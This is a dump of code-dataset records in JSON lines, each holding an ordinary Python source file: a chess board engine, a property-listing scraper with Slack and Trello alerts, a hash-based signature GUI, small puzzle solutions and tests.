range(len(scenario.body.layers)):\r\n name = \"Layer \" + str(i).zfill(2)\r\n layer_im = scenario.body.layers[i].to_image()\r\n self.append_row(name, layer_im)\r\n\r\n # area name\r\n for i in range(len(scenario.body.areas)):\r\n name = \"地名 \" + str(i).zfill(2)\r\n area = scenario.body.areas[i]\r\n self.append_row(name, str(area.name))\r\n\r\n # scene\r\n for i in range(40):\r\n for j in range(50):\r\n mes_struct = scenario.body.messages[i][j]\r\n data = mes_struct.data\r\n if len(data) > 0 and data[0] != ord('%'):\r\n mes = str(mes_struct)\r\n self.append_row(\"シーン %02d, %02d\" % (i+1, j), mes)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n main = Window(sys.argv[1:])\r\n sys.exit(app.exec_())\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"236535828","text":"import asyncio\nimport click\n\n@click.group(\"lw\", short_help=\"Light Wallet\")\ndef lw_cmd():\n \"\"\"Accounting functions without synching the wallet\"\"\"\n\n@lw_cmd.command(\"show\", short_help=\"Show the summary wallet balances for all configured keys. Good luck approach for first 500 puzzle hashes.\")\n@click.option(\n \"--puzzle-search\",\n \"-p\",\n default=500,\n help=\"Enter the amount of puzzle hashes to search for.\",\n type=int,\n required=True,\n)\n@click.option(\n \"--show-csv\",\n help=\"Show all transactions for all configured keys.\",\n default=False,\n show_default=True,\n is_flag=True\n)\n@click.pass_context\ndef show_cmd(ctx: click.Context, puzzle_search: int, show_csv: bool):\n from .lw_funcs import show_balance_summary, show_csv_export\n from pathlib import Path\n\n root_path: Path = ctx.obj[\"root_path\"]\n\n loop = asyncio.get_event_loop()\n try:\n if show_csv:\n loop.run_until_complete(show_csv_export(root_path, puzzle_search))\n else:\n loop.run_until_complete(show_balance_summary(root_path, puzzle_search))\n finally:\n loop.close()\n\n","sub_path":"chia/cmds/lw.py","file_name":"lw.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"603556701","text":"#-*- coding: utf-8 -*-\nfrom typing import List\nimport math\n\nimport time\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nclass Solution:\n # @param n, an integer\n # @return an integer\n def reverseBits(self, n):\n x = n\n ans = 0\n for i in range(32):\n ans |= ((x & 1) << (31 - i))\n x >>= 1\n return ans\n\n\n\n\nsamples = [\n # 1958pm start\n (43261596, 964176192),\n (4294967293, 3221225471),\n]\n\n# for s, t, expected in samples:\n# ans = Solution().isAnagram(s, t)\n# print(ans)\n\nfor S, expected in samples:\n ans = Solution().reverseBits(S)\n print(ans)\n","sub_path":"lc/esy/20190923_esy_190_reverse_bits.py","file_name":"20190923_esy_190_reverse_bits.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604768480","text":"from metaknight.piece import PieceType, Piece, Color\nfrom metaknight.square import Square\nfrom typing import List\n\n\nclass Board:\n def __init__(self):\n self.squares: List[List[Square]] = [[Square(file + rank) for file in Square.files] for rank in Square.ranks]\n self.set_up()\n\n def __repr__(self):\n return self.board_as_str(Color.WHITE)\n\n def board_as_str(self, perspective: Color):\n \"\"\"\n Prints the current state of the board\n :param perspective: prints from either white's perspective or black's perspective\n :return: string representation of the current board state\n \"\"\"\n output = ''\n if perspective is Color.WHITE:\n for rank in range(7, -1, -1):\n for file in range(0, 8):\n piece = self.squares[rank][file].piece\n if piece:\n output += f'{repr(piece)} '\n else:\n output += '. '\n output += '\\n'\n if perspective is Color.BLACK:\n for rank in range(0, 8):\n for file in range(7, -1, -1):\n piece = self.squares[rank][file].piece\n if piece:\n output += f'{repr(piece)} '\n else:\n output += '. '\n output += '\\n'\n return output[:-1] # This removes the last \\n character\n\n def clear(self):\n \"\"\" This method will only be used for debugging purposes\n \"\"\"\n self.squares = [[Square(file + rank) for file in Square.files] for rank in Square.ranks]\n\n def set_board_state(self, board_state: List[str]):\n \"\"\"\n Sets self.squares to the format given by board_state\n :param board_state: the pieces on each square\n \"\"\"\n self.clear()\n for i in range(0, 8):\n for j in range(0, 8):\n piece = board_state[i][j]\n if piece == '.':\n piece = None\n elif piece == 'p':\n piece = Piece(PieceType.PAWN, Color.WHITE)\n elif piece == 'n':\n piece = Piece(PieceType.KNIGHT, Color.WHITE)\n elif piece == 'b':\n piece = Piece(PieceType.BISHOP, Color.WHITE)\n elif piece == 'r':\n piece = Piece(PieceType.ROOK, Color.WHITE)\n elif piece == 'q':\n piece = Piece(PieceType.QUEEN, Color.WHITE)\n elif piece == 'k':\n piece = Piece(PieceType.KING, Color.WHITE)\n elif piece == 'P':\n piece = Piece(PieceType.PAWN, Color.BLACK)\n elif piece == 'N':\n piece = Piece(PieceType.KNIGHT, Color.BLACK)\n elif piece == 'B':\n piece = Piece(PieceType.BISHOP, Color.BLACK)\n elif piece == 'R':\n piece = Piece(PieceType.ROOK, Color.BLACK)\n elif piece == 'Q':\n piece = Piece(PieceType.QUEEN, Color.BLACK)\n elif piece == 'K':\n piece = Piece(PieceType.KING, Color.BLACK)\n self.squares[7-i][j].piece = piece\n\n def set_up(self):\n # Pawns\n for i in range(8):\n self.squares[1][i].piece = Piece(PieceType.PAWN, Color.WHITE)\n self.squares[6][i].piece = Piece(PieceType.PAWN, Color.BLACK)\n\n # Rooks\n for i in (0, 7):\n self.squares[0][i].piece = Piece(PieceType.ROOK, Color.WHITE)\n self.squares[7][i].piece = Piece(PieceType.ROOK, Color.BLACK)\n\n # Knights\n for i in (1, 6):\n self.squares[0][i].piece = Piece(PieceType.KNIGHT, Color.WHITE)\n self.squares[7][i].piece = Piece(PieceType.KNIGHT, Color.BLACK)\n\n # Bishops\n for i in (2, 5):\n self.squares[0][i].piece = Piece(PieceType.BISHOP, Color.WHITE)\n self.squares[7][i].piece = Piece(PieceType.BISHOP, Color.BLACK)\n\n # Kings and queens\n self.squares[0][3].piece = Piece(PieceType.QUEEN, Color.WHITE)\n self.squares[0][4].piece = Piece(PieceType.KING, Color.WHITE)\n self.squares[7][3].piece = Piece(PieceType.QUEEN, Color.BLACK)\n self.squares[7][4].piece = Piece(PieceType.KING, Color.BLACK)\n\n def get_square(self, location=None, square=None) -> Square:\n \"\"\"\n :param location: string coordinates of a square. For example: 'a3' or 'c8'\n :param square: a square object that is not located in this board\n :return: the square at location in this board\n \"\"\"\n if location == '00' or square == Square('00'):\n return Square('00')\n\n if location:\n file = Square.files.index(location[0])\n rank = Square.ranks.index(location[1])\n elif square:\n file = Square.files.index(square.file)\n rank = Square.ranks.index(square.rank)\n else:\n raise ValueError('Must enter either a string location, or a Square object')\n return self.squares[rank][file]\n\n def get_moves(self, location=None, square=None) -> List[List[Square]]:\n square = self.get_square(location=location, square=square)\n if square.piece.piece_type is PieceType.PAWN:\n return self._pawn_moves(square=square)\n elif square.piece.piece_type is PieceType.KNIGHT:\n return self._knight_moves(square=square)\n elif square.piece.piece_type is PieceType.BISHOP:\n return self._bishop_moves(square=square)\n elif square.piece.piece_type is PieceType.ROOK:\n return self._rook_moves(square=square)\n elif square.piece.piece_type is PieceType.QUEEN:\n return self._queen_moves(square=square)\n elif square.piece.piece_type is PieceType.KING:\n return self._king_moves(square=square)\n\n def _pawn_moves(self, square: Square) -> List[List[Square]]:\n moves = []\n square = self.get_square(square=square)\n color = square.piece.color\n forward = Square.up\n rank = '2'\n if square.piece.color is Color.BLACK:\n forward = Square.down\n rank = '7'\n\n forward_square = self.get_square(square=forward(square))\n if forward_square.piece is None:\n moves.append([forward_square])\n forward_square = self.get_square(square=forward(forward_square))\n if square.rank == rank and forward_square.piece is None:\n moves[0].append(forward_square)\n if square.file != 'a':\n diagonal = self.get_square(square=forward(square).left())\n if diagonal.piece and diagonal.piece.color is not color:\n moves.append([diagonal])\n if square.file != 'h':\n diagonal = self.get_square(square=forward(square).right())\n if diagonal.piece and diagonal.piece.color is not color:\n moves.append([diagonal])\n return moves\n\n def _knight_moves(self, square: Square) -> List[List[Square]]:\n original = self.get_square(square=square)\n color = original.piece.color\n moves = [\n self.get_square(square=original.up().up().left()),\n self.get_square(square=original.up().up().right()),\n self.get_square(square=original.down().down().left()),\n self.get_square(square=original.down().down().right()),\n self.get_square(square=original.left().left().up()),\n self.get_square(square=original.left().left().down()),\n self.get_square(square=original.right().right().up()),\n self.get_square(square=original.right().right().down())\n ]\n possible_moves = []\n for move in moves:\n if move != Square('00') and (not move.piece or move.piece.color is not color):\n possible_moves.append([move])\n return possible_moves\n\n def _bishop_moves(self, square: Square) -> List[List[Square]]:\n moves = []\n original = self.get_square(square=square)\n color = original.piece.color\n for func1 in (Square.up, Square.down):\n for func2 in (Square.left, Square.right):\n diagonal = []\n square = original\n while True:\n square = self.get_square(square=func2(func1(square)))\n if square == Square('00'):\n break\n if not square.piece and square != Square('00'):\n diagonal.append(square)\n elif square.piece.color is not color:\n diagonal.append(square)\n break\n else:\n break\n if len(diagonal) >= 1:\n moves.append(diagonal.copy())\n return moves\n\n def _rook_moves(self, square: Square) -> List[List[Square]]:\n moves = []\n original = self.get_square(square=square)\n color = original.piece.color\n for func in (Square.up, Square.down, Square.left, Square.right):\n line = []\n square = original\n while True:\n square = self.get_square(square=func(square))\n if square == Square('00'):\n break\n if not square.piece and square != Square('00'):\n line.append(square)\n elif square.piece.color is not color:\n line.append(square)\n break\n else:\n break\n if len(line) >= 1:\n moves.append(line.copy())\n return moves\n\n def _queen_moves(self, square: Square) -> List[List[Square]]:\n return self._rook_moves(square) + self._bishop_moves(square)\n\n def _king_moves(self, square: Square) -> List[List[Square]]:\n original = self.get_square(square=square)\n color = original.piece.color\n moves = [\n self.get_square(square=original.up().left()),\n self.get_square(square=original.up()),\n self.get_square(square=original.up().right()),\n self.get_square(square=original.right()),\n self.get_square(square=original.right().down()),\n self.get_square(square=original.down()),\n self.get_square(square=original.down().left()),\n self.get_square(square=original.left())\n ]\n possible_moves = []\n for move in moves:\n if move != Square('00') and (not move.piece or move.piece.color is not color):\n possible_moves.append([move])\n return possible_moves\n\n def in_check(self, color: Color) -> bool:\n \"\"\"\n Checks if the king of the specified color is in check\n :param color: the color of the king under inspection\n :return: true if the king is in check, of the specified color\n \"\"\"\n king_location: Square = None\n for row in self.squares:\n for square in row:\n if square.piece == Piece(PieceType.KING, color):\n king_location = square\n break\n\n for row in self.squares:\n for square in row:\n if square.piece and square.piece.color != color:\n # The piece on this square is of the opposite color, and could possible pose a check\n moves = self.get_moves(square=square)\n for direction in moves:\n for move in direction:\n if move == king_location:\n return True\n return False\n\n def evaluate(self) -> float:\n \"\"\"\n returns index representing what player is doing better. Negative number for black and positive for white\n 1 point indicates a pawn, so if evaluate() returns -2, black is 2 pawns ahead\n certain tactics will be used in this function, for example pins and doubled pawns\n \"\"\"\n # TODO: finish\n return self.evaluate_by_material()\n\n def evaluate_by_material(self) -> float:\n \"\"\"\n returns index representing what player is ahead in material using the standard value for pieces\n \"\"\"\n index: float = 0\n for row in self.squares:\n for square in row:\n if square.piece:\n color = 1 if square.piece.color is Color.WHITE else -1\n if square.piece.piece_type == PieceType.PAWN:\n index += color * 1\n elif square.piece.piece_type == PieceType.KNIGHT:\n index += color * 3\n elif square.piece.piece_type == PieceType.BISHOP:\n index += color * 3\n elif square.piece.piece_type == PieceType.ROOK:\n index += color * 5\n elif square.piece.piece_type == PieceType.QUEEN:\n index += color * 9\n return index\n\n\n","sub_path":"metaknight/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":13084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"220222032","text":"\"\"\"\n> Understanding the question..\nWe are trying to find continuous sub segments.\nminimum number of zeroes to erase to make it continuous sub-segments\n\"\"\"\n\nfrom collections import deque\n\ndef count_minimum(strs):\n if strs.count('1') == 0:\n return 0\n\n idx = strs.find('1')\n ns = strs[idx:]\n q = deque(ns)\n cnt = 0\n\n while q:\n ch = q.popleft()\n if ch == '0' and q.count('1') > 0:\n cnt += 1\n return cnt\n\n\nif __name__ == '__main__':\n t = int(input())\n while t:\n string = input()\n result = count_minimum(string)\n print(result)\n t -= 1","sub_path":"contests/1303A-Erazing-Zeroes.py","file_name":"1303A-Erazing-Zeroes.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"619757678","text":"from collections import abc, namedtuple\n\n\nclass _Type:\n fields = tuple()\n\n def __init__(self, **kwargs):\n for f in self.fields:\n if type(f) is str:\n setattr(self, f, kwargs.get(f, None))\n elif type(f) is tuple:\n setattr(self, f[1], kwargs.get(f[0], None))\n\n\nclass Response(_Type):\n fields = (\"status\", \"version\")\n\n def __init__(self, data, **kwargs):\n self.data = data\n\n for f in self.fields:\n setattr(self, f, kwargs.get(f, None))\n\n def pretty(self):\n return self.status\n\n\nclass MusicFolders(list):\n def pretty(self):\n print(\"\\n\".join([f\"{e.id}\\t{e.name}\" for e in self]))\n\n\nclass Album(_Type):\n fields = (\n \"id\",\n \"name\",\n \"artist\",\n \"artistId\",\n \"coverArt\",\n \"created\",\n \"duration\",\n \"songCount\",\n (\"song\", \"tracks\"),\n )\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n s = f\"\"\"Name: {self.name}\nID: {self.id}\n\nTracks\n\"\"\"\n return s + \"\\n\".join([t.pretty() for t in self.tracks])\n\n\nclass Artist(_Type):\n fields = (\"id\", \"name\", (\"album\", \"albums\"))\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n s = f\"\"\"Name: {self.name}\nID: {self.id}\n\nAlbums\n\"\"\"\n return s + \"\\n\".join([a.pretty() for a in self.albums])\n\n\nclass ArtistAlbum(_Type):\n fields = (\n \"id\",\n \"name\",\n \"artist\",\n \"artistId\",\n \"coverArt\",\n \"created\",\n \"duration\",\n \"songCount\",\n )\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n return f\"{self.id}\\t{self.name}\\t{self.artist}\\t{self.created}\"\n\n\nclass Genres(list):\n def pretty(self):\n return \"\\n\".join(self)\n\n\nclass Indexes(list):\n def pretty(self):\n return \"\\n\".join(\n [f\"{i.name}\\t{a.id}\\t{a.name}\" for i in self for a in i.artists]\n )\n\n\nclass MusicDirectory(_Type):\n fields = (\"id\", \"name\", \"parent\", (\"child\", \"children\"))\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n s = f\"\"\"Name: {self.name}\nID: {self.id}\nParent ID: {self.parent}\n\nContents\n\"\"\"\n\n return s + \"\\n\".join([c.pretty() for c in self.children])\n\n\nclass Child(_Type):\n fields = (\"id\", \"title\", \"parent\", \"isDir\", \"isVideo\", \"album\", \"artist\", \"created\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass Subdirectory(Child):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n return f\"Subdir\\t{self.id}\\t{self.title}\\t{self.parent}\\t{self.album}\\t{self.artist}\\t{self.created}\"\n\n\nclass Track(Child):\n fields = (\n \"album\",\n \"albumId\",\n \"artist\",\n \"artistId\",\n \"bitRate\",\n \"contentType\",\n \"coverArt\",\n \"created\",\n \"discNumber\",\n \"duration\",\n \"genre\",\n \"id\",\n \"isDir\",\n \"isVideo\",\n \"parent\",\n \"path\",\n \"size\",\n \"suffix\",\n \"title\",\n \"track\",\n \"type\",\n \"year\",\n )\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def pretty(self):\n return f\"Track\\t{self.id}\\t{self.title}\\t{self.parent}\\t{self.album}\\t{self.artist}\\t{self.created}\"\n\n\nIdName = namedtuple(\"IdName\", (\"id\", \"name\"))\nIndex = namedtuple(\"Index\", (\"name\", \"artists\"))\n","sub_path":"subsonic_client/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"348183501","text":"#\n# example of an acceptance test for a command-line app\n#\n\nimport os\n\nPROGRAM = '../mobydick/word_counter.py'\nTEXT_FILE = '../test_data/mobydick_summary.txt'\nOUTPUT = 'out.tmp'\n\nclass TestWordCounterAcceptanceTests:\n\n def test_commandline(self):\n \"\"\"Count words in a short text\"\"\"\n # remove output file if it is already there\n if os.path.exists(OUTPUT):\n os.remove(OUTPUT)\n\n # run the command line app\n cmd = 'python %s %s white > %s' % (PROGRAM, TEXT_FILE, OUTPUT)\n os.system(cmd)\n \n # check the output\n out = open(OUTPUT).read()\n self.assertTrue('white:\\t2' in out)\n\n","sub_path":"test/test_acceptance.py","file_name":"test_acceptance.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"488712257","text":"import sys\nimport hashlib\nimport base64\nimport json\n\nfrom PyQt4.QtGui import *\n\nimport merkle\nimport hbss_utilities\n\n\nclass QuantumSignatureGUI(QMainWindow):\n width = 380\n height = 200\n \n def __init__(self, parent=None):\n super(QuantumSignatureGUI, self).__init__(parent)\n self.init_ui()\n\n def init_ui(self):\n self.setFixedSize(self.width, self.height)\n self.setWindowTitle(\"Quantum Subscriber\")\n\n # Sign label\n userLabel = QLabel(self)\n userLabel.move(20, 15)\n userLabel.setText('File to SIGN:')\n # Sign textbox\n self.fileTextbox = QLineEdit(self)\n self.fileTextbox.move(20, 45)\n self.fileTextbox.resize(self.width - 40, 20)\n # Browse button\n buttonBrowse = QPushButton('Browse', self)\n buttonBrowse.move(20, 100)\n buttonBrowse.clicked.connect(self.browse_click)\n # Sign button\n buttonSign = QPushButton('Sign', self)\n buttonSign.move(260, 100)\n buttonSign.clicked.connect(self.sign_click)\n\n def browse_click(self):\n filename = QFileDialog.getOpenFileName(self, 'Open File', '/')\n self.fileTextbox.setText(filename)\n\n def sign_click(self):\n fname = self.fileTextbox.text()\n\n hashFromFile = hbss_utilities.calculate_hash_from_file(open(fname, 'rb'),\n hashlib.sha512())\n\n mytree = merkle.MerkleTree(4)\n publicKey = str(base64.b64encode(mytree.tree_public_key()),'utf-8')\n dictofPK = {}\n dictofPK[\"public_key: \"] = publicKey\n\n mysig = mytree._sign_message(hashFromFile)\n mysig.update(dictofPK)\n\n with open(\"signature.sig\",mode='w') as SigOut:\n SigOut.write(json.dumps(mysig, indent=2))\n\n finalMessage = QMessageBox(self)\n finalMessage.information(self,\n \"Message\",\n \"File was signed and signature was saved into \\\"signature.sig\\\"\")\n # print(\"Sprava bola podpisana\")\n\n\ndef main():\n app = QApplication(sys.argv)\n myApp = QuantumSignatureGUI()\n myApp.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"hbss.pyw","file_name":"hbss.pyw","file_ext":"pyw","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"191744260","text":"#!/usr/bin/python3\n\nimport argparse\nimport urllib.request\nimport json\nimport datetime\nimport requests\nfrom time import sleep\n\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlencode\nfrom collections import OrderedDict\nfrom get_url import parse_property_page, parse_property_page_sr, property_filepath, property_filepath_sr\nfrom slackclient import SlackClient\nimport trolly\n\nimport re\n\n\ndef mdlinks(text):\n return re.sub(r'\\<(.+?)\\|(.+?)\\>', r'[\\2](\\1)', text)\n\n\ndef create_card(title, description):\n description = mdlinks(description)\n description = description.replace(\"*\", \"**\")\n c2 = l2.add_card({'name': title, \"desc\": description})\n\n\nimport os\n\nwith open(os.path.join(os.path.dirname(os.path.realpath(__file__)),\n \"config.json\")) as f:\n config = json.load(f)\n sc_token = config[\"slack_token\"]\n tr_token = config[\"trello_token\"]\n tr_key = config[\"trello_key\"]\n tr_board = config[\"trello_board\"]\n work_addr1 = config[\"work_addr1\"]\n work_addr2 = config[\"work_addr2\"]\n radius = config.get(\"radius\", 20)\n areas = [work_addr1, work_addr2]\n # searchid1 = config[\"sr_searchid1\"]\n # searchid2 = config.get(\"sr_searchid2\", None)\n # searchids = [searchid1, searchid2]\n max_value = config.get(\"max_value\", 1500)\n min_value = config.get(\"min_value\", 1000)\n avail_from = config.get(\"avail_from\", datetime.datetime.today())\n avail_from = datetime.datetime.strptime(avail_from, \"%Y-%m-%d\") if not isinstance(avail_from, datetime.datetime) else avail_from\n delta = datetime.timedelta(days=config.get(\"delta_days\", 30))\n\nsc = SlackClient(sc_token)\n\nclient = trolly.client.Client(tr_key, tr_token)\nb2 = client.get_board(tr_board) # househunting\nb2.update_board()\nl2 = [_ for _ in b2.get_lists()][0] # first list on the left\nl2.update_list()\n\n\ndef directions_link(prop):\n def maps_link(start_addr, end_addr):\n query_string = urlencode(\n OrderedDict(f=\"d\",\n saddr=start_addr,\n daddr=end_addr,\n dirflg=\"r\"))\n\n return \"http://maps.google.co.uk/?%s\" % query_string\n\n if 'latlong' in prop:\n start_addr = prop[\"latlong\"]\n else:\n start_addr = \",\".join(prop['title'].split(\",\")[1:])\n\n return \"*Directions* 1: <{}|to {}> and 2: <{}|to {}>\".format(\n maps_link(start_addr, work_addr1), work_addr1,\n maps_link(start_addr, work_addr2), work_addr2)\n\n\ndef links_filepath():\n outdir = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(outdir, 'links.json')\n\n\ndef should_notify(prop):\n price = prop['price']\n title = prop['title']\n desc = prop['description']\n epc = prop['EPC']\n try:\n av = datetime.datetime.strptime(prop['available_from'], '%Y-%m-%d')\n except ValueError:\n av = datetime.datetime.today()\n\n if price > max_value:\n return False, \"too expensive: {} > {}\".format(price, max_value)\n if price < min_value:\n return False, \"too cheap: {} < {}\".format(price, min_value)\n\n if \"Note: This OpenRent Property Is No Longer Available For Rent\" in desc:\n return False, \"already let\"\n\n # if \"studio\" in desc.lower():\n # return False, \"studio\"\n\n # if \"studio\" in title.lower():\n # return False, \"studio\"\n\n if \"shared flat\" in desc.lower():\n return False, \"shared flat\"\n\n if \"shared flat\" in title.lower():\n return False, \"shared flat\"\n\n if epc and (epc.upper() in list(\"EFG\")):\n return False, \"EPC is too low: {}\".format(epc.upper())\n\n if av < avail_from:\n return False, \"Available date ({:%Y-%m-%d}) is too early\".format(av)\n if av > avail_from + delta:\n return False, \"Available date ({:%Y-%m-%d}) is too late\".format(av)\n\n return True, \"\"\n\n\ndef notify(property_id):\n print(\"Notifying about %s...\" % property_id)\n\n def make_link(property_id):\n return (\"https://www.openrent.co.uk/%s\" % property_id)\n\n sc.api_call(\"api.test\")\n sc.api_call(\"channels.info\", channel=\"1234567890\")\n\n with open(property_filepath(property_id)) as f:\n prop = json.load(f)\n\n should_notify_, reason = should_notify(prop)\n if not should_notify_:\n print(\"Skipping notification: %s...\" % reason)\n return\n\n if not len(prop['location']) > 0:\n prop['location'].append(['unknown'] * 2)\n text = (\"<{link}|{title}> close to {location} ({walk_duration}):\\n\"\n \"*Price:* {price}. *Available from:* {av}. *EPC:* {epc}. {has_garden}\\n\"\n \"{directions}.\\n*Description:*\\n{desc}\").format(\n location=prop['location'][0][0],\n walk_duration=prop['location'][0][1],\n link=make_link(property_id),\n price=prop['price'],\n desc=prop['description'][:1000],\n av=prop['available_from'],\n title=prop['title'],\n epc=prop['EPC'],\n directions=directions_link(prop),\n has_garden=\"With garden. \" if prop['has_garden'] else \"\")\n\n sc.api_call(\"chat.postMessage\", channel=\"#general\",\n text=text, username='propertybot',\n icon_emoji=':new:')\n create_card(\"{} - {}\".format(prop['title'], prop['price']), text)\n\n\ndef update_list(should_notify=True, area=work_addr1):\n query_string = urlencode(\n OrderedDict(term=area,\n within=str(radius),\n prices_min=min_value,\n prices_max=max_value,\n bedrooms_min=0,\n bedrooms_max=3,\n isLive=\"true\"))\n\n url = (\"http://www.openrent.co.uk/properties-to-rent/?%s\" % query_string)\n\n html_doc = urllib.request.urlopen(url).read()\n soup = BeautifulSoup(html_doc, 'html.parser')\n\n if os.path.isfile(links_filepath()):\n with open(links_filepath()) as f:\n existing_links = json.load(f)\n else:\n existing_links = {}\n\n with open(links_filepath(), 'w') as f:\n latest_links = [x['href'][1:] for x\n in soup.find_all(\"a\", class_=\"banda pt\")]\n print(\"Received %s property links...\" % len(latest_links))\n latest_and_old = list(set(latest_links) | set(existing_links.get('openrent', [])))\n all_data = existing_links.copy()\n all_data['openrent'] = latest_and_old\n json.dump(all_data, f, indent=4)\n\n new_links = list(set(latest_links) - set(existing_links.get('openrent',[])))\n print(\"Found %s new links!...\" % len(new_links))\n\n for property_id in new_links:\n test = parse_property_page(property_id)\n if should_notify and test is not None:\n notify(property_id)\n else:\n print(\"Found a property %s but notifications are disabled.\"\n % property_id)\n\n\ndef notify_sr(property_id):\n print(\"Notifying about %s...\" % property_id)\n\n def make_link(property_id):\n return (\"https://www.spareroom.co.uk/%s\" % property_id)\n\n sc.api_call(\"api.test\")\n sc.api_call(\"channels.info\", channel=\"1234567890\")\n\n with open(property_filepath_sr(property_id)) as f:\n prop = json.load(f)\n\n should_notify_, reason = should_notify(prop)\n if not should_notify_:\n print(\"Skipping notification: %s...\" % reason)\n return\n\n if not len(prop['location']) > 0:\n prop['location'].append(['unknown'] * 2)\n text = (\"<{link}|{title}> close to {location} ({walk_duration}):\\n\"\n \"*Price:* {price:.2f}. *Available from:* {av}. *EPC:* {epc}. {has_garden}\\n\"\n \"{directions}.\\n*Description:*\\n{desc}\").format(\n location=prop['location'][0][0],\n walk_duration=prop['location'][0][1],\n link=make_link(property_id),\n price=prop['price'],\n desc=prop['description'][:1000],\n av=prop['available_from'],\n title=prop['title'],\n epc=prop['EPC'],\n directions=directions_link(prop),\n has_garden=\"With garden. \" if prop['has_garden'] else \"\")\n\n sc.api_call(\"chat.postMessage\", channel=\"#general\",\n text=text, username='propertybot',\n icon_emoji=':new:')\n create_card(\"{} - {:.2f}\".format(prop['title'], prop['price']), text)\n\n\ndef update_list_sr(should_notify=True, area=work_addr1, search_id=None):\n\n headers = {'User-Agent': 'SpareRoomUK 3.1'}\n cookies = {'session_id': '00000000', 'session_key': '000000000000000'}\n api_location = 'http://iphoneapp.spareroom.co.uk'\n api_search_endpoint = 'flatshares'\n api_details_endpoint = 'flatshares'\n\n def make_get_request(url=None, headers=None, cookies=None, proxies=None, sleep_time=0.3):\n # if DEBUG:\n print('Sleeping for {secs} seconds'.format(secs=sleep_time))\n sleep(sleep_time)\n return requests.get(url, cookies=cookies, headers=headers).text\n\n if search_id is None:\n params = OrderedDict(format='json',\n max_rent=max_value,\n per='pcm',\n page=1,\n max_per_page=100,\n where=area.lower(),\n miles_from_max=str(radius),\n posted_by=\"private_landlords\",\n showme_1beds='Y',\n available_from='{:%Y-%m-%d}'.format(avail_from),\n )\n\n else:\n params = OrderedDict(format='json',\n search_id=search_id,\n page=1)\n\n sr_results = list()\n page = 1\n total_pages = 100\n pages_left = 100\n while pages_left:\n url = '{location}/{endpoint}?{params}'.format(location=api_location,\n endpoint=api_search_endpoint,\n params=urlencode(params))\n try:\n results = json.loads(make_get_request(url=url,\n cookies=cookies,\n headers=headers))\n page = results['page']\n total_pages = results['pages']\n pages_left = total_pages - page\n sr_results.extend(results['results'])\n # if VERBOSE:\n # print('Parsing page {page}/{total} flats in {area}'.format(page=results['page'], total=results['pages'], area=area))\n except Exception as e:\n print(e)\n return None\n params['page'] += 1\n\n # Add results to the list\n if os.path.isfile(links_filepath()):\n with open(links_filepath()) as f:\n existing_links = json.load(f)\n else:\n existing_links = {}\n\n with open(links_filepath(), 'w') as f:\n latest_links = [r['advert_id'] for r in sr_results]\n print(\"Received %s property links...\" % len(latest_links))\n print(\" saved links {}\".format(len(set(existing_links.get('spareroom', [])))))\n latest_and_old = list(set(latest_links) | set(existing_links.get('spareroom',[])))\n all_data = existing_links.copy()\n all_data['spareroom'] = latest_and_old\n json.dump(all_data, f, indent=4)\n\n new_links = list(set(latest_links) - set(existing_links.get('spareroom', [])))\n print(\"Found %s new links!...\" % len(new_links))\n new_links = [r for r in sr_results if r['advert_id'] in new_links]\n\n # === Check each property and create notification\n for property_prop in new_links:\n property_id = property_prop['advert_id']\n test = parse_property_page_sr(property_prop)\n if should_notify and test is not None:\n notify_sr(property_id)\n else:\n print(\"Found a property %s but notifications are disabled.\"\n % property_id)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nonotify\", help=\"don't notify\", action='store_true',\n default=False)\n args = parser.parse_args()\n\n should_notify_ = not args.nonotify\n if not os.path.isfile(links_filepath()):\n should_notify_ = False\n print(\"No links.json detected. This must be the first run: not\"\n \" notifying about all suitable properties.\")\n for area in areas:\n update_list(should_notify=should_notify_, area=area)\n update_list_sr(should_notify=should_notify_, area=area)\n# TODO: MAX TERM IN SR\n","sub_path":"get_properties.py","file_name":"get_properties.py","file_ext":"py","file_size_in_byte":12367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"511067648","text":"import pygame\npygame.init()\n\npygame.display.set_mode(size=(300, 500))\n\n # for event in pygame.event.get():\nkey = pygame.key.get_pressed()\n # print(key)\nif key[pygame.K_RIGHT]:\n print(\"向右……\")\n print(key)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} 